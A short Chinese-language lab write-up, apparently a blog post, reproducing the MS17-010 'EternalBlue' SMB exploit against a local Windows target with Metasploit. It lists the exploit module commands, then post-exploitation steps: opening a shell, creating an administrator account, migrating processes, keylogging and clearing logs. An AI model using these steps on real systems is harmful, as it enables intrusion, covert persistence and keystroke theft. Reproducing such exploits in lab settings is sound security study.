ms-17-010(永恒之蓝)漏洞

📅 2026/8/25 20:39:46
ms-17-010(永恒之蓝)漏洞
一、漏洞简介1.1永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具其中就包含“永恒之蓝”工具“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。恶意代码会扫描开放445文件共享端口的Windows机器无需用户任何操作只要开机上网就可以进行非法操作。1.2漏洞类型缓冲区溢出漏洞二、实验过程2.1 IP地址靶机IP192.168.199.130攻击机IP192.168.199.1292.2 靶机和攻击机之间互连2.3 查看靶机是否开启445端口 长度太长就截到看清445端口2.4 在kali中启动Metasploit Framework搜索ms17-010相关模块2.5 我们使用现成的payload进行攻击use exploit/windows/smb/ms17_010_eternalblueset RHOST 192.168.199.130run执行成功2.6 输入shell2.7 出现乱码输入chcp 650012.8 查看用户并创建administrations添加到admin管理组2.9 输入exit退出shell2.10 获取进程并查看2.11 输入run migrate -f 迁移进程这里发现创建了1196这个进程我们进行查看一下这里看到它有一个权限特别高的notepad2.12 键盘记录scan_stsrtscan_dumpscan_stop2.13 最后的最后进行日志清理以上就是永恒之蓝的操作过程的复现